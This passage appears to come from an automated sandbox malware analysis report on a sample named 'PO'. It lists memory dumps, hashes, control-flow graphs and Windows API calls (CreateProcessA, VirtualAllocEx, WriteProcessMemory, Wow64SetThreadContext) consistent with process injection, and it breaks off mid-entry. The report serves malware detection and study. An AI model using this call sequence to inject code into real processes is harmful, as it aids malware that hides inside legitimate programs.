                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dc2540c136f52cc958cff125f043e57406b7aec06dc50065eb2e0c3d52cfc2db
                        • Instruction ID: 49ce99f344e59334696104f5fd5b68618e89ae3d6d0b769447201639a246d494
                        • Opcode Fuzzy Hash: dc2540c136f52cc958cff125f043e57406b7aec06dc50065eb2e0c3d52cfc2db
                        • Instruction Fuzzy Hash: 5F9158B4D24219EFCB08CFE5D88089EFBB6FF8A310F10952AD455AB264D734A906CF11
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0d891e61f1902858937ca56c75a0e487a6a26a6375fb5c160e2d7e2840370e65
                        • Instruction ID: e46d4a854f96dc20733a1c20f03bd41be8c4b4fcac30b300724e4142f1ae10c4
                        • Opcode Fuzzy Hash: 0d891e61f1902858937ca56c75a0e487a6a26a6375fb5c160e2d7e2840370e65
                        • Instruction Fuzzy Hash: 38714BB4D2421AEFCB18CFE4D88089EFBB6FF8A310F109526D055AB265D734A946CB11
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7a50000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e7cc4d81f22852a37130450ba2f2bf2cc667d7a491eed674056144863f0db3ad
                        • Instruction ID: 42e668ac1796eb7ab6b6fd01ab40eab043c1a2a691b7a0b97d9c689f7098620a
                        • Opcode Fuzzy Hash: e7cc4d81f22852a37130450ba2f2bf2cc667d7a491eed674056144863f0db3ad
                        • Instruction Fuzzy Hash: EBD09EB881D258CBC745DF64D4445F9F7F9BB4F310F403155D81AA3221D7319981CE05

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 532 70e4328-70e4357 534 70e435d-70e435f 532->534 535 70e47b0-70e47d5 532->535 536 70e4371 534->536 537 70e4361-70e436f 534->537 554 70e47dc-70e47f4 535->554 538 70e4373-70e4375 536->538 537->538 540 70e4377-70e4379 538->540 541 70e4395-70e43ae 538->541 542 70e438b 540->542 543 70e437b-70e4389 540->543 548 70e43c2-70e43c7 541->548 549 70e43b0-70e43bf 541->549 545 70e438d-70e438f 542->545 543->545 545->541 550 70e4797 545->550 548->550 552 70e43cd-70e43d3 548->552 549->548 553 70e4798 550->553 556 70e43d5-70e43d7 552->556 557 70e43e1-70e4416 552->557 558 70e47aa-70e47ad 553->558 559 70e479a-70e47a9 553->559 554->553 563 70e47f6-70e4844 554->563 556->557 566 70e44d2-70e44d6 557->566 559->558 703 70e484a call 70e4ad0 563->703 704 70e484a call 70e4ac1 563->704 568 70e44d8 566->568 569 70e44e0-70e44e6 566->569 700 70e44da call 70e47f8 568->700 701 70e44da call 70e4328 568->701 702 70e44da call 70e4301 568->702 570 70e44ec-70e4502 569->570 571 70e441b-70e441f 569->571 572 70e4504-70e450f 570->572 573 70e4515-70e451a 570->573 575 70e4429-70e442f 571->575 576 70e4421 571->576 572->573 577 70e45f8-70e45fc 573->577 578 70e443e-70e4444 575->578 579 70e4431-70e4436 575->579 576->575 581 70e45fe 577->581 582 70e4606-70e460f 577->582 578->554 583 70e444a-70e4465 578->583 579->578 581->582 584 70e451f-70e4523 582->584 585 70e4615-70e4619 582->585 592 70e4467-70e4469 583->592 593 70e4473-70e447c 583->593 587 70e452d-70e4536 584->587 588 70e4525 584->588 589 70e461b-70e4642 585->589 590 70e4693-70e4697 585->590 596 70e4538-70e453d 587->596 597 70e4545-70e454e 587->597 588->587 589->590 622 70e4644-70e4648 589->622 594 70e469d-70e46b1 590->594 595 70e476a-70e4794 590->595 592->593 598 70e447e-70e4482 593->598 599 70e44d1 593->599 611 70e46b7 594->611 612 70e46b3-70e46b5 594->612 596->597 597->554 602 70e4554-70e456f 597->602 603 70e44ab-70e44c4 598->603 604 70e4484-70e4488 598->604 599->566 615 70e457d-70e45b5 602->615 616 70e4571-70e4573 602->616 625 70e44ca 603->625 608 70e448a-70e4495 604->608 609 70e449b-70e44a9 604->609 608->609 609->625 610 70e4850-70e4ab8 617 70e46ba-70e46e1 611->617 612->617 641 70e45b7-70e45bb 615->641 642 70e45f5 615->642 616->615 638 70e471c-70e4740 617->638 639 70e46e3-70e46ee 617->639 627 70e464a-70e4672 622->627 628 70e4674-70e468d 622->628 625->599 627->590 628->590 654 70e474a-70e474b 638->654 655 70e4742 638->655 651 70e4706-70e471a 639->651 652 70e46f0-70e46f6 639->652 643 70e45cd-70e45e6 641->643 644 70e45bd-70e45cb 641->644 642->577 659 70e45ec-70e45f3 643->659 644->659 651->638 651->639 657 70e46fa-70e46fc 652->657 658 70e46f8 652->658 654->595 655->654 657->651 658->651 659->585 700->569 701->569 702->569 703->610 704->610
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID: (aq$LR]q$PH]q$$]q$$]q$$]q
                        • API String ID: 0-1937764415
                        • Opcode ID: f50268f6ad4032d0ff1eceadb3281b9fb6a974c3dd4ab7ae32c6d6eec80710fe
                        • Instruction ID: b953ec03bc83c2f71fae915b0f6470c4a3023b00be50f0d539fe547c47c8a959
                        • Opcode Fuzzy Hash: f50268f6ad4032d0ff1eceadb3281b9fb6a974c3dd4ab7ae32c6d6eec80710fe
                        • Instruction Fuzzy Hash: A6228F747045058FDB08DF65D499AAD7BF6FF88700F108219F9069B3A9CB76AD82CB81

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 705 70e8398-70e83c8 706 70e83ea-70e83ef 705->706 707 70e83ca-70e83cd 705->707 706->707 708 70e83cf 707->708 709 70e83d6-70e83e8 707->709 708->706 708->709 710 70e840d-70e8410 708->710 711 70e856b-70e856d 708->711 712 70e8546-70e854d 708->712 713 70e8406-70e840b 708->713 714 70e8527-70e8531 708->714 715 70e8462-70e8469 708->715 716 70e85c0-70e85c4 708->716 717 70e8480-70e848a 708->717 718 70e85e1-70e8607 708->718 719 70e8561-70e8566 708->719 720 70e84bf-70e84d5 708->720 721 70e863c-70e8645 708->721 722 70e8436-70e8438 708->722 723 70e84f7-70e84fb 708->723 724 70e85d7-70e85dc 708->724 725 70e84b5-70e84ba 708->725 726 70e83f1 708->726 709->707 730 70e8654 710->730 736 70e8416-70e8420 710->736 737 70e856f-70e8575 711->737 738 70e858b 711->738 732 70e8659-70e8663 712->732 735 70e8553-70e855c 712->735 713->707 714->732 733 70e8537-70e8541 714->733 715->732 743 70e846f-70e847b 715->743 741 70e85c6 716->741 742 70e85d0-70e85d5 716->742 717->732 744 70e8490-70e84a1 717->744 774 70e860c-70e8616 718->774 775 70e8609 718->775 719->707 734 70e83f4-70e83f6 720->734 761 70e84db-70e84e5 720->761 729 70e8647-70e864f 721->729 721->730 739 70e843a-70e8440 722->739 740 70e8456 722->740 727 70e851c 723->727 728 70e84fd-70e8506 723->728 724->707 725->707 726->734 746 70e851f-70e8526 727->746 747 70e850d-70e8510 728->747 748 70e8508-70e850b 728->748 729->707 730->732 733->707 749 70e83ff-70e8404 734->749 750 70e83f8 734->750 735->707 736->732 751 70e8426-70e842f 736->751 752 70e857b-70e8587 737->752 753 70e8577-70e8579 737->753 754 70e858d-70e85ac 738->754 756 70e8446-70e8452 739->756 757 70e8442-70e8444 739->757 755 70e8458-70e8459 740->755 758 70e85cb 741->758 742->724 742->758 743->707 744->732 760 70e84a7-70e84b0 744->760 762 70e851a 747->762 748->762 749->713 763 70e83fd 749->763 750->763 765 70e8434 751->765 766 70e8431 751->766 767 70e8589 752->767 753->767 754->732 776 70e85b2-70e85bb 754->776 782 70e845c call 70e8800 755->782 783 70e845c call 70e8810 755->783 768 70e8454 756->768 757->768 758->707 760->707 761->732 770 70e84eb-70e84f2 761->770 762->746 763->707 765->707 766->765 767->754 768->755 770->707 777 70e861c 774->777 778 70e8618-70e861a 774->778 775->774 776->707 779 70e861f-70e8631 777->779 778->779 779->732 781 70e8633-70e8637 779->781 781->707 782->715 783->715
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID: LR]q$LR]q$LR]q$LR]q$$]q$$]q
                        • API String ID: 0-2875722158
                        • Opcode ID: 5c742acbbecfaf42ae6e5ec66f56351abc251ff68fc49a91344b5c7e6d057627
                        • Instruction ID: 5cce7a459555551a147ce906d1375e7fc2099374d75a19cdd649f33cce9b2541
                        • Opcode Fuzzy Hash: 5c742acbbecfaf42ae6e5ec66f56351abc251ff68fc49a91344b5c7e6d057627
                        • Instruction Fuzzy Hash: A471CFF1A14119CFCB148BA9D4547BDBBF9EB4A300F14EA66E066BB2D1CB74DC408B61

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1171 70e4301-70e4318 1172 70e431a-70e4357 1171->1172 1173 70e4381-70e4389 1171->1173 1179 70e435d-70e435f 1172->1179 1180 70e47b0-70e47d5 1172->1180 1174 70e438d-70e438f 1173->1174 1176 70e4797 1174->1176 1177 70e4395-70e43ae 1174->1177 1178 70e4798 1176->1178 1186 70e43c2-70e43c7 1177->1186 1187 70e43b0-70e43bf 1177->1187 1181 70e47aa-70e47ad 1178->1181 1182 70e479a-70e47a9 1178->1182 1183 70e4371 1179->1183 1184 70e4361-70e436f 1179->1184 1201 70e47dc-70e47f4 1180->1201 1182->1181 1188 70e4373-70e4375 1183->1188 1184->1188 1186->1176 1190 70e43cd-70e43d3 1186->1190 1187->1186 1188->1177 1192 70e4377-70e4379 1188->1192 1194 70e43d5-70e43d7 1190->1194 1195 70e43e1-70e4416 1190->1195 1196 70e438b 1192->1196 1197 70e437b 1192->1197 1194->1195 1203 70e44d2-70e44d6 1195->1203 1196->1174 1197->1173 1201->1178 1209 70e47f6-70e4844 1201->1209 1205 70e44d8 1203->1205 1206 70e44e0-70e44e6 1203->1206 1342 70e44da call 70e47f8 1205->1342 1343 70e44da call 70e4328 1205->1343 1344 70e44da call 70e4301 1205->1344 1207 70e44ec-70e4502 1206->1207 1208 70e441b-70e441f 1206->1208 1210 70e4504-70e450f 1207->1210 1211 70e4515-70e451a 1207->1211 1213 70e4429-70e442f 1208->1213 1214 70e4421 1208->1214 1340 70e484a call 70e4ad0 1209->1340 1341 70e484a call 70e4ac1 1209->1341 1210->1211 1215 70e45f8-70e45fc 1211->1215 1216 70e443e-70e4444 1213->1216 1217 70e4431-70e4436 1213->1217 1214->1213 1219 70e45fe 1215->1219 1220 70e4606-70e460f 1215->1220 1216->1201 1221 70e444a-70e4465 1216->1221 1217->1216 1219->1220 1222 70e451f-70e4523 1220->1222 1223 70e4615-70e4619 1220->1223 1230 70e4467-70e4469 1221->1230 1231 70e4473-70e447c 1221->1231 1225 70e452d-70e4536 1222->1225 1226 70e4525 1222->1226 1227 70e461b-70e4642 1223->1227 1228 70e4693-70e4697 1223->1228 1234 70e4538-70e453d 1225->1234 1235 70e4545-70e454e 1225->1235 1226->1225 1227->1228 1260 70e4644-70e4648 1227->1260 1232 70e469d-70e46b1 1228->1232 1233 70e476a-70e4794 1228->1233 1230->1231 1236 70e447e-70e4482 1231->1236 1237 70e44d1 1231->1237 1249 70e46b7 1232->1249 1250 70e46b3-70e46b5 1232->1250 1234->1235 1235->1201 1240 70e4554-70e456f 1235->1240 1241 70e44ab-70e44c4 1236->1241 1242 70e4484-70e4488 1236->1242 1237->1203 1253 70e457d-70e45b5 1240->1253 1254 70e4571-70e4573 1240->1254 1263 70e44ca 1241->1263 1246 70e448a-70e4495 1242->1246 1247 70e449b-70e44a9 1242->1247 1246->1247 1247->1263 1255 70e46ba-70e46e1 1249->1255 1250->1255 1278 70e45b7-70e45bb 1253->1278 1279 70e45f5 1253->1279 1254->1253 1275 70e471c-70e4740 1255->1275 1276 70e46e3-70e46ee 1255->1276 1265 70e464a-70e4672 1260->1265 1266 70e4674-70e468d 1260->1266 1263->1237 1265->1228 1266->1228 1267 70e4850-70e4ab8 1292 70e474a-70e474b 1275->1292 1293 70e4742 1275->1293 1289 70e4706-70e471a 1276->1289 1290 70e46f0-70e46f6 1276->1290 1281 70e45cd-70e45e6 1278->1281 1282 70e45bd-70e45cb 1278->1282 1279->1215 1297 70e45ec-70e45f3 1281->1297 1282->1297 1289->1275 1289->1276 1295 70e46fa-70e46fc 1290->1295 1296 70e46f8 1290->1296 1292->1233 1293->1292 1295->1289 1296->1289 1297->1223 1340->1267 1341->1267 1342->1206 1343->1206 1344->1206
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID: LR]q$PH]q$$]q$$]q
                        • API String ID: 0-3307124116
                        • Opcode ID: 5e414f98e66a0e096de10f0c60a1990ee55eb64ce60e1936fd5e5154367b60ad
                        • Instruction ID: 2599f8320b94200478a9c685ff97a5ad603b1cfff409c4e67411468b6f970766
                        • Opcode Fuzzy Hash: 5e414f98e66a0e096de10f0c60a1990ee55eb64ce60e1936fd5e5154367b60ad
                        • Instruction Fuzzy Hash: 657180B0B002868FDB58CF69C9947ADBBF6AF89300F148669F446DB3A5DB34D841CB51
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID: LR]q$LR]q$$]q
                        • API String ID: 0-2603884067
                        • Opcode ID: 61b4c498271bf4dad27afc15800406138a38981faa5228f513e29c7939d16f4d
                        • Instruction ID: d444af77f7b7f5c5558c48a1c038b9713b4ba7ede91aafbf8e5c9ccd1ecd1bec
                        • Opcode Fuzzy Hash: 61b4c498271bf4dad27afc15800406138a38981faa5228f513e29c7939d16f4d
                        • Instruction Fuzzy Hash: F861D0F1E18115CFCB148BA8D4447BDBBF9EB46301F18EB66E065BB2D2C77498408B61
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID: Te]q$Te]q
                        • API String ID: 0-3320153681
                        • Opcode ID: 038079aa6402da1c02a4c6e61382eb1d5da19b2f52c8238f291d9d3f2f8a3ea7
                        • Instruction ID: 24bc8ec9be8122b67d4ff3d5e87c88295b482373df83a8e6aec2f0fa618687aa
                        • Opcode Fuzzy Hash: 038079aa6402da1c02a4c6e61382eb1d5da19b2f52c8238f291d9d3f2f8a3ea7
                        • Instruction Fuzzy Hash: 226160B4E082498FCB09CFE9C9456EDBFB6FF8A300F14816AD419AB366D7745906CB50
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID: Te]q$Te]q
                        • API String ID: 0-3320153681
                        • Opcode ID: a9fd0fffc6067fe608ee204d7fd7364f33fb0441fbee2f45e2b74420d8265eec
                        • Instruction ID: 7bb539b236f622d78cef522c7f4501485cfbd681cc2ffc0901a2bbe9aa4b6c28
                        • Opcode Fuzzy Hash: a9fd0fffc6067fe608ee204d7fd7364f33fb0441fbee2f45e2b74420d8265eec
                        • Instruction Fuzzy Hash: 7A61D4B4E14209CFDB08CFA9C984AEDBBFAFF89300F109529D419AB355DB709905CB50
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A5419E
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7a50000_PO.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 6a8c36bc07f25bc808daab01d32aad852fbcfd7003a9b79dda4c75543311388b
                        • Instruction ID: e1e2b868fd4ba86521960cea34c70428954d9a71e849f43f15a95b5693c84368
                        • Opcode Fuzzy Hash: 6a8c36bc07f25bc808daab01d32aad852fbcfd7003a9b79dda4c75543311388b
                        • Instruction Fuzzy Hash: 0CA18DB1D0065ADFDB24CF69C841BEDBBB2BF88310F148569D818A7280DB749985CF92
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A5419E
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7a50000_PO.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 932d5596507add26e9b48e1cf2c950c8c61904015f7a3c7014d1c814da4d11f6
                        • Instruction ID: ddea8f4d5a49210095ef4cc89d838b6f7ba8616369052cbdc1c7a17a33258a2e
                        • Opcode Fuzzy Hash: 932d5596507add26e9b48e1cf2c950c8c61904015f7a3c7014d1c814da4d11f6
                        • Instruction Fuzzy Hash: C0919FB1D0065ADFDF24CF69C8417EDBBB2BF88310F148569D818A7280DB759985CF92
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 00FC5DB9
                        Memory Dump Source
                        • Source File: 00000007.00000002.2159867410.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_fc0000_PO.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 0a640aa97e7049c1d9de7fafc5ef1af3ee274e42948d053ed487859f1e01fa22
                        • Instruction ID: 21797eda17fe960e4c6688b36c3819193fad27176613ecb445aeb8a334594c33
                        • Opcode Fuzzy Hash: 0a640aa97e7049c1d9de7fafc5ef1af3ee274e42948d053ed487859f1e01fa22
                        • Instruction Fuzzy Hash: C24112B0C00719CBDB24DFA9C944BDDBBF5BF48704F20806AD418AB255DB756986CF91
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 00FC5DB9
                        Memory Dump Source
                        • Source File: 00000007.00000002.2159867410.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_fc0000_PO.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 6d87c51c92015619a17c2b699fba74e77b2897d49bc556178d9d44c8562bdf14
                        • Instruction ID: d9469e68f7f3780c532c805afdb5943b07210a63fdf245acc3c3939e7270309a
                        • Opcode Fuzzy Hash: 6d87c51c92015619a17c2b699fba74e77b2897d49bc556178d9d44c8562bdf14
                        • Instruction Fuzzy Hash: 9C4123B0C0071DCBDB24DFA9C944B8DBBF6BF48704F20806AD419AB255DB756986CFA0
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A53D70
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7a50000_PO.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 7ba1bd9e23e0f89165bd2f9afed21d032022147d8272a1a29caa9412e1c456af
                        • Instruction ID: 141ce6b59dba50da7740092fb78aa56c91179fb6b13c687aba03eb182d12d8b0
                        • Opcode Fuzzy Hash: 7ba1bd9e23e0f89165bd2f9afed21d032022147d8272a1a29caa9412e1c456af
                        • Instruction Fuzzy Hash: DE214BB69013499FDB10DFA9C841BEEBFF5FF49314F108829E919A7250C7789940CBA0
                        APIs
                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05B7436D,?,?), ref: 05B7441F
                        Memory Dump Source
                        • Source File: 00000007.00000002.2162458931.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_5b70000_PO.jbxd
                        Similarity
                        • API ID: DrawText
                        • String ID:
                        • API String ID: 2175133113-0
                        • Opcode ID: 759d7bd29cfa64c442b483d212159d9dad9084fea11ac9e276baf775735f4b04
                        • Instruction ID: fc3b5905183ceedcb562707284e22005dbc947d1e130d70db7fd086bf23c1501
                        • Opcode Fuzzy Hash: 759d7bd29cfa64c442b483d212159d9dad9084fea11ac9e276baf775735f4b04
                        • Instruction Fuzzy Hash: 6E31C3B590030D9FDB10DF9AD884ADEFBF5FB58310F14846AE919A7210D775A944CFA0
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A53D70
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7a50000_PO.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: c88a0a8064558c6e48573b7f97f6c1476f99f70590206c39c88c3cc15fe88597
                        • Instruction ID: 6e14fd4a50e432d45e26017069bccaad5e6754ebb922304a0397f76285cde00a
                        • Opcode Fuzzy Hash: c88a0a8064558c6e48573b7f97f6c1476f99f70590206c39c88c3cc15fe88597
                        • Instruction Fuzzy Hash: F4213BB69003499FCF10DFA9C845BEEBBF5FF88314F108829E919A7240C7789944CBA0
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A53BC6
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7a50000_PO.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: ed7d0f33fe2eb27ad50105972106f99e7d180a50dca02fa784403034f5b60731
                        • Instruction ID: 18631344bcb077e672351e691aa83f0923c496e6c8e53455481beea980c3f9dc
                        • Opcode Fuzzy Hash: ed7d0f33fe2eb27ad50105972106f99e7d180a50dca02fa784403034f5b60731
                        • Instruction Fuzzy Hash: A0213CB5D003099FDB10DFAAC4857EEBFF4EF89324F14842AD859A7241CB789545CBA1
                        APIs
                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05B7436D,?,?), ref: 05B7441F
                        Memory Dump Source
                        • Source File: 00000007.00000002.2162458931.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_5b70000_PO.jbxd
                        Similarity
                        • API ID: DrawText
                        • String ID:
                        • API String ID: 2175133113-0
                        • Opcode ID: 7f664604f21eecf880e630ec334bdc85b1f867a4e973e38dcdacf1b4260b5b67
                        • Instruction ID: 9c25db8e028250c3aa6d3d727f39e1a957b1f339092ed38134b9dc8847d860d2
                        • Opcode Fuzzy Hash: 7f664604f21eecf880e630ec334bdc85b1f867a4e973e38dcdacf1b4260b5b67
                        • Instruction Fuzzy Hash: C621D2B5D0020A9FDB10CF9AD9846DEFBF5FF48320F14842AE919A7210D774A944CFA0
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A53E50
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7a50000_PO.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 306b6f7725f9f9d5620f3938929db12df3a3e98297fbbb8ea3052609028f392f
                        • Instruction ID: 83f65607cbddbd06b6631c64a238862ef19f56296a5423c2b7b9b796807c0902
                        • Opcode Fuzzy Hash: 306b6f7725f9f9d5620f3938929db12df3a3e98297fbbb8ea3052609028f392f
                        • Instruction Fuzzy Hash: 862105B18002599FDB10DFAAC881BEEFBF5FF48310F50842AE959A7250C7789940CBA1
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00FCDE16,?,?,?,?,?), ref: 00FCDED7
                        Memory Dump Source
                        • Source File: 00000007.00000002.2159867410.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_fc0000_PO.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 940644a3802c82ca044668e33653434b81dee6debdeb8bedb0522d3151e2dfc0
                        • Instruction ID: b1b87f81d8a05480218033ba4a0edf0454eb1de7051f0615653a5918eee4051d
                        • Opcode Fuzzy Hash: 940644a3802c82ca044668e33653434b81dee6debdeb8bedb0522d3151e2dfc0
                        • Instruction Fuzzy Hash: BE21E6B5D002099FDB10CF9AD985AEEBBF5FB48310F14841AE914B7350D378A950DFA4
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A53E50
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7a50000_PO.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 8f43df49f1a30db5639fdc4f62209ef78731349f35c2839fd577e55fcba25936
                        • Instruction ID: 69bc5e0ddadaf6ed12af169a7643a091f73d005d4a4bdc912105fa2708c3d9b1
                        • Opcode Fuzzy Hash: 8f43df49f1a30db5639fdc4f62209ef78731349f35c2839fd577e55fcba25936
                        • Instruction Fuzzy Hash: 3321F8B1C002599FDB10DFAAC885AEEFBF5FF48310F50842AE919A7250C7789544DBA1
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A53BC6
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7a50000_PO.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: f722ff3295d78b8aa0ddc8e1789e65f04d3acbd2f1f96993f24e1933de5765ad
                        • Instruction ID: 2ec95d47806b68609737f44571dfacd0752f636760b3df2a1dfde9a6b0c741e7
                        • Opcode Fuzzy Hash: f722ff3295d78b8aa0ddc8e1789e65f04d3acbd2f1f96993f24e1933de5765ad
                        • Instruction Fuzzy Hash: D72149B1D003099FDB10DFAAC4857EEBBF4EF88314F10842AD419A7240CB78A944CFA0
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A53C8E
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163581045.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7a50000_PO.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: ed9338aa9d3e4b81d34af0dd80127e632fa0fd34b1352dafeaa30f3c6bac4edd
                        • Instruction ID: bc1c2a21bd061c00d4750cfc5dd2725b58f8b28dc9b3f6878da1ab0653b23cca
                        • Opcode Fuzzy Hash: ed9338aa9d3e4b81d34af0dd80127e632fa0fd34b1352dafeaa30f3c6bac4edd
                        • Instruction Fuzzy Hash: 1E1129B68002499FDB10DFAAC845AEEFFF5EF88314F108819E919A7250C779A554CBA1
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FCB839,00000800,00000000,00000000), ref: 00FCBA4A
                        Memory Dump Source
